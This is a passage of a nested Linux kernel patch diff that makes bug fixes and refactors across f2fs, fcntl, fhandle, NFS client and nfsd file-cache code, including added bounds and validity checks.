++		option.log_cluster_size > MAX_COMPRESS_LOG_SIZE ||
++		option.algorithm >= COMPRESS_MAX)
+ 		return -EINVAL;
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+ 
+ 	f2fs_down_write(&F2FS_I(inode)->i_sem);
++	if (!f2fs_compressed_file(inode)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	if (f2fs_is_mmap_file(inode) || get_dirty_pages(inode)) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -4066,7 +4068,7 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 	if (!f2fs_compressed_file(inode))
+ 		return -EINVAL;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+@@ -4138,7 +4140,7 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 	if (!f2fs_compressed_file(inode))
+ 		return -EINVAL;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index ec7212f7a9b73..d4662ccb94c8f 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1187,8 +1187,8 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 		.op = REQ_OP_READ,
+ 		.op_flags = 0,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.retry = false,
++		.in_list = 0,
++		.retry = 0,
+ 	};
+ 	int err;
+ 
+@@ -1276,8 +1276,8 @@ static int move_data_block(struct inode *inode, block_t bidx,
+ 		.op = REQ_OP_READ,
+ 		.op_flags = 0,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.retry = false,
++		.in_list = 0,
++		.retry = 0,
+ 	};
+ 	struct dnode_of_data dn;
+ 	struct f2fs_summary sum;
+@@ -1410,8 +1410,6 @@ static int move_data_block(struct inode *inode, block_t bidx,
+ 
+ 	f2fs_update_data_blkaddr(&dn, newaddr);
+ 	set_inode_flag(inode, FI_APPEND_WRITE);
+-	if (page->index == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ put_page_out:
+ 	f2fs_put_page(fio.encrypted_page, 1);
+ recover_block:
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 0010579f17368..869bb6ec107cc 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -59,49 +59,31 @@ void f2fs_set_inode_flags(struct inode *inode)
+ 			S_ENCRYPTED|S_VERITY|S_CASEFOLD);
+ }
+ 
+-static void __get_inode_rdev(struct inode *inode, struct f2fs_inode *ri)
++static void __get_inode_rdev(struct inode *inode, struct page *node_page)
+ {
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, node_page);
+ 
+ 	if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode) ||
+ 			S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
+-		if (ri->i_addr[extra_size])
+-			inode->i_rdev = old_decode_dev(
+-				le32_to_cpu(ri->i_addr[extra_size]));
++		if (addr[0])
++			inode->i_rdev = old_decode_dev(le32_to_cpu(addr[0]));
+ 		else
+-			inode->i_rdev = new_decode_dev(
+-				le32_to_cpu(ri->i_addr[extra_size + 1]));
++			inode->i_rdev = new_decode_dev(le32_to_cpu(addr[1]));
+ 	}
+ }
+ 
+-static int __written_first_block(struct f2fs_sb_info *sbi,
+-					struct f2fs_inode *ri)
++static void __set_inode_rdev(struct inode *inode, struct page *node_page)
+ {
+-	block_t addr = le32_to_cpu(ri->i_addr[offset_in_addr(ri)]);
+-
+-	if (!__is_valid_data_blkaddr(addr))
+-		return 1;
+-	if (!f2fs_is_valid_blkaddr(sbi, addr, DATA_GENERIC_ENHANCE)) {
+-		f2fs_handle_error(sbi, ERROR_INVALID_BLKADDR);
+-		return -EFSCORRUPTED;
+-	}
+-	return 0;
+-}
+-
+-static void __set_inode_rdev(struct inode *inode, struct f2fs_inode *ri)
+-{
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, node_page);
+ 
+ 	if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
+ 		if (old_valid_dev(inode->i_rdev)) {
+-			ri->i_addr[extra_size] =
+-				cpu_to_le32(old_encode_dev(inode->i_rdev));
+-			ri->i_addr[extra_size + 1] = 0;
++			addr[0] = cpu_to_le32(old_encode_dev(inode->i_rdev));
++			addr[1] = 0;
+ 		} else {
+-			ri->i_addr[extra_size] = 0;
+-			ri->i_addr[extra_size + 1] =
+-				cpu_to_le32(new_encode_dev(inode->i_rdev));
+-			ri->i_addr[extra_size + 2] = 0;
++			addr[0] = 0;
++			addr[1] = cpu_to_le32(new_encode_dev(inode->i_rdev));
++			addr[2] = 0;
+ 		}
+ 	}
+ }
+@@ -336,7 +318,6 @@ static int do_read_inode(struct inode *inode)
+ 	struct page *node_page;
+ 	struct f2fs_inode *ri;
+ 	projid_t i_projid;
+-	int err;
+ 
+ 	/* Check if ino is within scope */
+ 	if (f2fs_check_nid_range(sbi, inode->i_ino))
+@@ -415,17 +396,7 @@ static int do_read_inode(struct inode *inode)
+ 	}
+ 
+ 	/* get rdev by using inline_info */
+-	__get_inode_rdev(inode, ri);
+-
+-	if (S_ISREG(inode->i_mode)) {
+-		err = __written_first_block(sbi, ri);
+-		if (err < 0) {
+-			f2fs_put_page(node_page, 1);
+-			return err;
+-		}
+-		if (!err)
+-			set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+-	}
++	__get_inode_rdev(inode, node_page);
+ 
+ 	if (!f2fs_need_inode_block_update(sbi, inode->i_ino))
+ 		fi->last_disk_size = inode->i_size;
+@@ -697,7 +668,7 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 		}
+ 	}
+ 
+-	__set_inode_rdev(inode, ri);
++	__set_inode_rdev(inode, node_page);
+ 
+ 	/* deleted inode */
+ 	if (inode->i_nlink == 0)
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index c6d0e07096326..fcf22a50ff5db 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -850,21 +850,29 @@ int f2fs_get_dnode_of_data(struct dnode_of_data *dn, pgoff_t index, int mode)
+ 
+ 	if (is_inode_flag_set(dn->inode, FI_COMPRESSED_FILE) &&
+ 					f2fs_sb_has_readonly(sbi)) {
+-		unsigned int c_len = f2fs_cluster_blocks_are_contiguous(dn);
++		unsigned int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
++		unsigned int ofs_in_node = dn->ofs_in_node;
++		pgoff_t fofs = index;
++		unsigned int c_len;
+ 		block_t blkaddr;
+ 
++		/* should align fofs and ofs_in_node to cluster_size */
++		if (fofs % cluster_size) {
++			fofs = round_down(fofs, cluster_size);
++			ofs_in_node = round_down(ofs_in_node, cluster_size);
++		}
++
++		c_len = f2fs_cluster_blocks_are_contiguous(dn, ofs_in_node);
+ 		if (!c_len)
+ 			goto out;
+ 
+-		blkaddr = f2fs_data_blkaddr(dn);
++		blkaddr = data_blkaddr(dn->inode, dn->node_page, ofs_in_node);
+ 		if (blkaddr == COMPRESS_ADDR)
+ 			blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + 1);
++						ofs_in_node + 1);
+ 
+ 		f2fs_update_read_extent_tree_range_compressed(dn->inode,
+-					index, blkaddr,
+-					F2FS_I(dn->inode)->i_cluster_size,
+-					c_len);
++					fofs, blkaddr, cluster_size, c_len);
+ 	}
+ out:
+ 	return 0;
+@@ -1587,7 +1595,7 @@ static int __write_node_page(struct page *page, bool atomic, bool *submitted,
+ 		.op_flags = wbc_to_write_flags(wbc),
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+ 	};
+diff --git a/fs/f2fs/recovery.c b/fs/f2fs/recovery.c
+index 53a6487f91e44..f5efc37a2b513 100644
+--- a/fs/f2fs/recovery.c
++++ b/fs/f2fs/recovery.c
+@@ -582,6 +582,19 @@ static int check_index_in_prev_nodes(struct f2fs_sb_info *sbi,
+ 	return 0;
+ }
+ 
++static int f2fs_reserve_new_block_retry(struct dnode_of_data *dn)
++{
++	int i, err = 0;
++
++	for (i = DEFAULT_FAILURE_RETRY_COUNT; i > 0; i--) {
++		err = f2fs_reserve_new_block(dn);
++		if (!err)
++			break;
++	}
++
++	return err;
++}
++
+ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 					struct page *page)
+ {
+@@ -683,14 +696,8 @@ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 		 */
+ 		if (dest == NEW_ADDR) {
+ 			f2fs_truncate_data_blocks_range(&dn, 1);
+-			do {
+-				err = f2fs_reserve_new_block(&dn);
+-				if (err == -ENOSPC) {
+-					f2fs_bug_on(sbi, 1);
+-					break;
+-				}
+-			} while (err &&
+-				IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++
++			err = f2fs_reserve_new_block_retry(&dn);
+ 			if (err)
+ 				goto err;
+ 			continue;
+@@ -698,16 +705,8 @@ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 
+ 		/* dest is valid block, try to recover from src to dest */
+ 		if (f2fs_is_valid_blkaddr(sbi, dest, META_POR)) {
+-
+ 			if (src == NULL_ADDR) {
+-				do {
+-					err = f2fs_reserve_new_block(&dn);
+-					if (err == -ENOSPC) {
+-						f2fs_bug_on(sbi, 1);
+-						break;
+-					}
+-				} while (err &&
+-					IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++				err = f2fs_reserve_new_block_retry(&dn);
+ 				if (err)
+ 					goto err;
+ 			}
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 16bf9d5c8d4f9..aa1ba2fdfe00d 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -247,7 +247,7 @@ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
+-		err = inc_valid_block_count(sbi, inode, &count);
++		err = inc_valid_block_count(sbi, inode, &count, true);
+ 		if (err) {
+ 			f2fs_put_dnode(&dn);
+ 			return err;
+@@ -3312,10 +3312,10 @@ void f2fs_allocate_data_block(struct f2fs_sb_info *sbi, struct page *page,
+ 		struct f2fs_bio_info *io;
+ 
+ 		if (F2FS_IO_ALIGNED(sbi))
+-			fio->retry = false;
++			fio->retry = 0;
+ 
+ 		INIT_LIST_HEAD(&fio->list);
+-		fio->in_list = true;
++		fio->in_list = 1;
+ 		io = sbi->write_io[fio->type] + fio->temp;
+ 		spin_lock(&io->io_lock);
+ 		list_add_tail(&fio->list, &io->io_list);
+@@ -3396,7 +3396,7 @@ void f2fs_do_write_meta_page(struct f2fs_sb_info *sbi, struct page *page,
+ 		.new_blkaddr = page->index,
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
++		.in_list = 0,
+ 	};
+ 
+ 	if (unlikely(page->index >= MAIN_BLKADDR(sbi)))
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index f3951e8ad3948..aa9ad85e0901d 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -586,23 +586,22 @@ static inline bool has_curseg_enough_space(struct f2fs_sb_info *sbi,
+ 			unsigned int node_blocks, unsigned int dent_blocks)
+ {
+ 
+-	unsigned int segno, left_blocks;
++	unsigned segno, left_blocks;
+ 	int i;
+ 
+-	/* check current node segment */
++	/* check current node sections in the worst case. */
+ 	for (i = CURSEG_HOT_NODE; i <= CURSEG_COLD_NODE; i++) {
+ 		segno = CURSEG_I(sbi, i)->segno;
+-		left_blocks = f2fs_usable_blks_in_seg(sbi, segno) -
+-				get_seg_entry(sbi, segno)->ckpt_valid_blocks;
+-
++		left_blocks = CAP_BLKS_PER_SEC(sbi) -
++				get_ckpt_valid_blocks(sbi, segno, true);
+ 		if (node_blocks > left_blocks)
+ 			return false;
+ 	}
+ 
+-	/* check current data segment */
++	/* check current data section for dentry blocks. */
+ 	segno = CURSEG_I(sbi, CURSEG_HOT_DATA)->segno;
+-	left_blocks = f2fs_usable_blks_in_seg(sbi, segno) -
+-			get_seg_entry(sbi, segno)->ckpt_valid_blocks;
++	left_blocks = CAP_BLKS_PER_SEC(sbi) -
++			get_ckpt_valid_blocks(sbi, segno, true);
+ 	if (dent_blocks > left_blocks)
+ 		return false;
+ 	return true;
+@@ -651,7 +650,7 @@ static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+ 
+ 	if (free_secs > upper_secs)
+ 		return false;
+-	else if (free_secs <= lower_secs)
++	if (free_secs <= lower_secs)
+ 		return true;
+ 	return !curseg_space;
+ }
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 0c0d0671febea..c529ce5d986cc 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -649,7 +649,7 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ #ifdef CONFIG_F2FS_FS_ZSTD
+ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ {
+-	unsigned int level;
++	int level;
+ 	int len = 4;
+ 
+ 	if (strlen(str) == len) {
+@@ -663,9 +663,15 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 		f2fs_info(sbi, "wrong format, e.g. <alg_name>:<compr_level>");
+ 		return -EINVAL;
+ 	}
+-	if (kstrtouint(str + 1, 10, &level))
++	if (kstrtoint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
++	/* f2fs does not support negative compress level now */
++	if (level < 0) {
++		f2fs_info(sbi, "do not support negative compress level: %d", level);
++		return -ERANGE;
++	}
++
+ 	if (!f2fs_is_compress_level_valid(COMPRESS_ZSTD, level)) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
+diff --git a/fs/fcntl.c b/fs/fcntl.c
+index 146c9ab0cd4b7..0964e5dbf0cac 100644
+--- a/fs/fcntl.c
++++ b/fs/fcntl.c
+@@ -267,7 +267,7 @@ static int f_getowner_uids(struct file *filp, unsigned long arg)
+ }
+ #endif
+ 
+-static bool rw_hint_valid(enum rw_hint hint)
++static bool rw_hint_valid(u64 hint)
+ {
+ 	switch (hint) {
+ 	case RWH_WRITE_LIFE_NOT_SET:
+@@ -287,19 +287,17 @@ static long fcntl_rw_hint(struct file *file, unsigned int cmd,
+ {
+ 	struct inode *inode = file_inode(file);
+ 	u64 __user *argp = (u64 __user *)arg;
+-	enum rw_hint hint;
+-	u64 h;
++	u64 hint;
+ 
+ 	switch (cmd) {
+ 	case F_GET_RW_HINT:
+-		h = inode->i_write_hint;
+-		if (copy_to_user(argp, &h, sizeof(*argp)))
++		hint = inode->i_write_hint;
++		if (copy_to_user(argp, &hint, sizeof(*argp)))
+ 			return -EFAULT;
+ 		return 0;
+ 	case F_SET_RW_HINT:
+-		if (copy_from_user(&h, argp, sizeof(h)))
++		if (copy_from_user(&hint, argp, sizeof(hint)))
+ 			return -EFAULT;
+-		hint = (enum rw_hint) h;
+ 		if (!rw_hint_valid(hint))
+ 			return -EINVAL;
+ 
+diff --git a/fs/fhandle.c b/fs/fhandle.c
+index f2bc27d1975e1..a8c25557c8c12 100644
+--- a/fs/fhandle.c
++++ b/fs/fhandle.c
+@@ -37,7 +37,7 @@ static long do_sys_name_to_handle(const struct path *path,
+ 	if (f_handle.handle_bytes > MAX_HANDLE_SZ)
+ 		return -EINVAL;
+ 
+-	handle = kmalloc(sizeof(struct file_handle) + f_handle.handle_bytes,
++	handle = kzalloc(sizeof(struct file_handle) + f_handle.handle_bytes,
+ 			 GFP_KERNEL);
+ 	if (!handle)
+ 		return -ENOMEM;
+diff --git a/fs/nfs/export.c b/fs/nfs/export.c
+index 01596f2d0a1ed..9fe9586a51b71 100644
+--- a/fs/nfs/export.c
++++ b/fs/nfs/export.c
+@@ -156,7 +156,10 @@ const struct export_operations nfs_export_ops = {
+ 	.fh_to_dentry = nfs_fh_to_dentry,
+ 	.get_parent = nfs_get_parent,
+ 	.fetch_iversion = nfs_fetch_iversion,
+-	.flags = EXPORT_OP_NOWCC|EXPORT_OP_NOSUBTREECHK|
+-		EXPORT_OP_CLOSE_BEFORE_UNLINK|EXPORT_OP_REMOTE_FS|
+-		EXPORT_OP_NOATOMIC_ATTR,
++	.flags = EXPORT_OP_NOWCC		|
++		 EXPORT_OP_NOSUBTREECHK		|
++		 EXPORT_OP_CLOSE_BEFORE_UNLINK	|
++		 EXPORT_OP_REMOTE_FS		|
++		 EXPORT_OP_NOATOMIC_ATTR	|
++		 EXPORT_OP_FLUSH_ON_CLOSE,
+ };
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 81bbafab18a99..4376881be7918 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -2016,7 +2016,7 @@ static void ff_layout_cancel_io(struct pnfs_layout_segment *lseg)
+ 	for (idx = 0; idx < flseg->mirror_array_cnt; idx++) {
+ 		mirror = flseg->mirror_array[idx];
+ 		mirror_ds = mirror->mirror_ds;
+-		if (!mirror_ds)
++		if (IS_ERR_OR_NULL(mirror_ds))
+ 			continue;
+ 		ds = mirror->mirror_ds->ds;
+ 		if (!ds)
+diff --git a/fs/nfs/nfs42.h b/fs/nfs/nfs42.h
+index b59876b01a1e3..0282d93c8bccb 100644
+--- a/fs/nfs/nfs42.h
++++ b/fs/nfs/nfs42.h
+@@ -55,11 +55,14 @@ int nfs42_proc_removexattr(struct inode *inode, const char *name);
+  * They would be 7 bytes long in the eventual buffer ("user.x\0"), and
+  * 8 bytes long XDR-encoded.
+  *
+- * Include the trailing eof word as well.
++ * Include the trailing eof word as well and make the result a multiple
++ * of 4 bytes.
+  */
+ static inline u32 nfs42_listxattr_xdrsize(u32 buflen)
+ {
+-	return ((buflen / (XATTR_USER_PREFIX_LEN + 2)) * 8) + 4;
++	u32 size = 8 * buflen / (XATTR_USER_PREFIX_LEN + 2) + 4;
++
++	return (size + 3) & ~3;
+ }
+ #endif /* CONFIG_NFS_V4_2 */
+ #endif /* __LINUX_FS_NFS_NFS4_2_H */
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index ec3f0103e1a7f..7cc74f7451d67 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10592,29 +10592,33 @@ const struct nfs4_minor_version_ops *nfs_v4_minor_ops[] = {
+ static ssize_t nfs4_listxattr(struct dentry *dentry, char *list, size_t size)
+ {
+ 	ssize_t error, error2, error3;
++	size_t left = size;
+ 
+-	error = generic_listxattr(dentry, list, size);
++	error = generic_listxattr(dentry, list, left);
+ 	if (error < 0)
+ 		return error;
+ 	if (list) {
+ 		list += error;
+-		size -= error;
++		left -= error;
+ 	}
+ 
+-	error2 = nfs4_listxattr_nfs4_label(d_inode(dentry), list, size);
++	error2 = nfs4_listxattr_nfs4_label(d_inode(dentry), list, left);
+ 	if (error2 < 0)
+ 		return error2;
+ 
+ 	if (list) {
+ 		list += error2;
+-		size -= error2;
++		left -= error2;
+ 	}
+ 
+-	error3 = nfs4_listxattr_nfs4_user(d_inode(dentry), list, size);
++	error3 = nfs4_listxattr_nfs4_user(d_inode(dentry), list, left);
+ 	if (error3 < 0)
+ 		return error3;
+ 
+-	return error + error2 + error3;
++	error += error2 + error3;
++	if (size && error > size)
++		return -ERANGE;
++	return error;
+ }
+ 
+ static void nfs4_enable_swap(struct inode *inode)
+diff --git a/fs/nfs/nfsroot.c b/fs/nfs/nfsroot.c
+index 620329b7e6aeb..0b1c1d2e076c1 100644
+--- a/fs/nfs/nfsroot.c
++++ b/fs/nfs/nfsroot.c
+@@ -175,10 +175,10 @@ static int __init root_nfs_cat(char *dest, const char *src,
+ 	size_t len = strlen(dest);
+ 
+ 	if (len && dest[len - 1] != ',')
+-		if (strlcat(dest, ",", destlen) > destlen)
++		if (strlcat(dest, ",", destlen) >= destlen)
+ 			return -1;
+ 
+-	if (strlcat(dest, src, destlen) > destlen)
++	if (strlcat(dest, src, destlen) >= destlen)
+ 		return -1;
+ 	return 0;
+ }
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 697acf5c3c681..ee9c923192e08 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -74,70 +74,9 @@ static struct list_lru			nfsd_file_lru;
+ static unsigned long			nfsd_file_flags;
+ static struct fsnotify_group		*nfsd_file_fsnotify_group;
+ static struct delayed_work		nfsd_filecache_laundrette;
+-static struct rhashtable		nfsd_file_rhash_tbl
++static struct rhltable			nfsd_file_rhltable
+ 						____cacheline_aligned_in_smp;
+ 
+-enum nfsd_file_lookup_type {
+-	NFSD_FILE_KEY_INODE,
+-	NFSD_FILE_KEY_FULL,
+-};
+-
+-struct nfsd_file_lookup_key {
+-	struct inode			*inode;
+-	struct net			*net;
+-	const struct cred		*cred;
+-	unsigned char			need;
+-	bool				gc;
+-	enum nfsd_file_lookup_type	type;
+-};
+-
+-/*
+- * The returned hash value is based solely on the address of an in-code
+- * inode, a pointer to a slab-allocated object. The entropy in such a
+- * pointer is concentrated in its middle bits.
+- */
+-static u32 nfsd_file_inode_hash(const struct inode *inode, u32 seed)
+-{
+-	unsigned long ptr = (unsigned long)inode;
+-	u32 k;
+-
+-	k = ptr >> L1_CACHE_SHIFT;
+-	k &= 0x00ffffff;
+-	return jhash2(&k, 1, seed);
+-}
+-
+-/**
+- * nfsd_file_key_hashfn - Compute the hash value of a lookup key
+- * @data: key on which to compute the hash value
+- * @len: rhash table's key_len parameter (unused)
+- * @seed: rhash table's random seed of the day
+- *
+- * Return value:
+- *   Computed 32-bit hash value
+- */
+-static u32 nfsd_file_key_hashfn(const void *data, u32 len, u32 seed)
+-{
+-	const struct nfsd_file_lookup_key *key = data;
+-
+-	return nfsd_file_inode_hash(key->inode, seed);
+-}
+-
+-/**
+- * nfsd_file_obj_hashfn - Compute the hash value of an nfsd_file
+- * @data: object on which to compute the hash value
+- * @len: rhash table's key_len parameter (unused)
+- * @seed: rhash table's random seed of the day
+- *
+- * Return value:
+- *   Computed 32-bit hash value
+- */
+-static u32 nfsd_file_obj_hashfn(const void *data, u32 len, u32 seed)
+-{
+-	const struct nfsd_file *nf = data;
+-
+-	return nfsd_file_inode_hash(nf->nf_inode, seed);
+-}
+-
+ static bool
+ nfsd_match_cred(const struct cred *c1, const struct cred *c2)
+ {
+@@ -158,53 +97,16 @@ nfsd_match_cred(const struct cred *c1, const struct cred *c2)
+ 	return true;
+ }
+ 
+-/**
+- * nfsd_file_obj_cmpfn - Match a cache item against search criteria
+- * @arg: search criteria
+- * @ptr: cache item to check
+- *
+- * Return values:
+- *   %0 - Item matches search criteria
+- *   %1 - Item does not match search criteria
+- */
+-static int nfsd_file_obj_cmpfn(struct rhashtable_compare_arg *arg,
+-			       const void *ptr)
+-{
+-	const struct nfsd_file_lookup_key *key = arg->key;
+-	const struct nfsd_file *nf = ptr;
+-
+-	switch (key->type) {
+-	case NFSD_FILE_KEY_INODE:
+-		if (nf->nf_inode != key->inode)
+-			return 1;
+-		break;
+-	case NFSD_FILE_KEY_FULL:
+-		if (nf->nf_inode != key->inode)
+-			return 1;
+-		if (nf->nf_may != key->need)
+-			return 1;
+-		if (nf->nf_net != key->net)
+-			return 1;
+-		if (!nfsd_match_cred(nf->nf_cred, key->cred))
+-			return 1;
+-		if (!!test_bit(NFSD_FILE_GC, &nf->nf_flags) != key->gc)
+-			return 1;
+-		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
+-			return 1;
+-		break;
+-	}
+-	return 0;
+-}
+-
+ static const struct rhashtable_params nfsd_file_rhash_params = {
+ 	.key_len		= sizeof_field(struct nfsd_file, nf_inode),
+ 	.key_offset		= offsetof(struct nfsd_file, nf_inode),
+-	.head_offset		= offsetof(struct nfsd_file, nf_rhash),
+-	.hashfn			= nfsd_file_key_hashfn,
+-	.obj_hashfn		= nfsd_file_obj_hashfn,
+-	.obj_cmpfn		= nfsd_file_obj_cmpfn,
+-	/* Reduce resizing churn on light workloads */
+-	.min_size		= 512,		/* buckets */
++	.head_offset		= offsetof(struct nfsd_file, nf_rlist),
++
++	/*
++	 * Start with a single page hash table to reduce resizing churn
++	 * on light workloads.
++	 */
++	.min_size		= 256,
+ 	.automatic_shrinking	= true,
+ };
+ 
+@@ -307,27 +209,27 @@ nfsd_file_mark_find_or_create(struct nfsd_file *nf, struct inode *inode)
+ }
+ 
+ static struct nfsd_file *
+-nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
++nfsd_file_alloc(struct net *net, struct inode *inode, unsigned char need,
++		bool want_gc)
+ {
+ 	struct nfsd_file *nf;
+ 
+ 	nf = kmem_cache_alloc(nfsd_file_slab, GFP_KERNEL);
+-	if (nf) {
+-		INIT_LIST_HEAD(&nf->nf_lru);
+-		nf->nf_birthtime = ktime_get();
+-		nf->nf_file = NULL;
+-		nf->nf_cred = get_current_cred();
+-		nf->nf_net = key->net;
+-		nf->nf_flags = 0;
+-		__set_bit(NFSD_FILE_HASHED, &nf->nf_flags);
+-		__set_bit(NFSD_FILE_PENDING, &nf->nf_flags);
+-		if (key->gc)
+-			__set_bit(NFSD_FILE_GC, &nf->nf_flags);
+-		nf->nf_inode = key->inode;
+-		refcount_set(&nf->nf_ref, 1);
+-		nf->nf_may = key->need;
+-		nf->nf_mark = NULL;
+-	}
++	if (unlikely(!nf))
++		return NULL;
++
++	INIT_LIST_HEAD(&nf->nf_lru);
++	nf->nf_birthtime = ktime_get();
++	nf->nf_file = NULL;
++	nf->nf_cred = get_current_cred();
++	nf->nf_net = net;
++	nf->nf_flags = want_gc ?
++		BIT(NFSD_FILE_HASHED) | BIT(NFSD_FILE_PENDING) | BIT(NFSD_FILE_GC) :
++		BIT(NFSD_FILE_HASHED) | BIT(NFSD_FILE_PENDING);
++	nf->nf_inode = inode;
++	refcount_set(&nf->nf_ref, 1);
++	nf->nf_may = need;
++	nf->nf_mark = NULL;
+ 	return nf;
+ }
+ 
+@@ -352,8 +254,8 @@ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+-			       nfsd_file_rhash_params);
++	rhltable_remove(&nfsd_file_rhltable, &nf->nf_rlist,
++			nfsd_file_rhash_params);
+ }
+ 
+ static bool
+@@ -380,10 +282,8 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+-		get_file(nf->nf_file);
+-		filp_close(nf->nf_file, NULL);
+ 		nfsd_file_check_write_error(nf);
+-		fput(nf->nf_file);
++		filp_close(nf->nf_file, NULL);
+ 	}
+ 
+ 	/*
+@@ -402,13 +302,23 @@ nfsd_file_check_writeback(struct nfsd_file *nf)
+ 	struct file *file = nf->nf_file;
+ 	struct address_space *mapping;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
++	/* File not open for write? */
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	/*
++	 * Some filesystems (e.g. NFS) flush all dirty data on close.
++	 * On others, there is no need to wait for writeback.
++	 */
++	if (!(file_inode(file)->i_sb->s_export_op->flags & EXPORT_OP_FLUSH_ON_CLOSE))
+ 		return false;
++
+ 	mapping = file->f_mapping;
+ 	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
+ 		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
+ }
+ 
++
+ static bool nfsd_file_lru_add(struct nfsd_file *nf)
+ {
+ 	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
+@@ -431,7 +341,7 @@ static bool nfsd_file_lru_remove(struct nfsd_file *nf)
+ struct nfsd_file *
+ nfsd_file_get(struct nfsd_file *nf)
+ {
+-	if (likely(refcount_inc_not_zero(&nf->nf_ref)))
++	if (nf && refcount_inc_not_zero(&nf->nf_ref))
+ 		return nf;
+ 	return NULL;
+ }
+@@ -492,49 +402,26 @@ nfsd_file_dispose_list(struct list_head *dispose)
+ 	}
+ }
+ 
+-static void
+-nfsd_file_list_remove_disposal(struct list_head *dst,
+-		struct nfsd_fcache_disposal *l)
+-{
+-	spin_lock(&l->lock);
+-	list_splice_init(&l->freeme, dst);
+-	spin_unlock(&l->lock);
+-}
+-
+-static void
+-nfsd_file_list_add_disposal(struct list_head *files, struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct nfsd_fcache_disposal *l = nn->fcache_disposal;
+-
+-	spin_lock(&l->lock);
+-	list_splice_tail_init(files, &l->freeme);
+-	spin_unlock(&l->lock);
+-	queue_work(nfsd_filecache_wq, &l->work);
+-}
+-
+-static void
+-nfsd_file_list_add_pernet(struct list_head *dst, struct list_head *src,
+-		struct net *net)
+-{
+-	struct nfsd_file *nf, *tmp;
+-
+-	list_for_each_entry_safe(nf, tmp, src, nf_lru) {
+-		if (nf->nf_net == net)
+-			list_move_tail(&nf->nf_lru, dst);
+-	}
+-}
+-
++/**
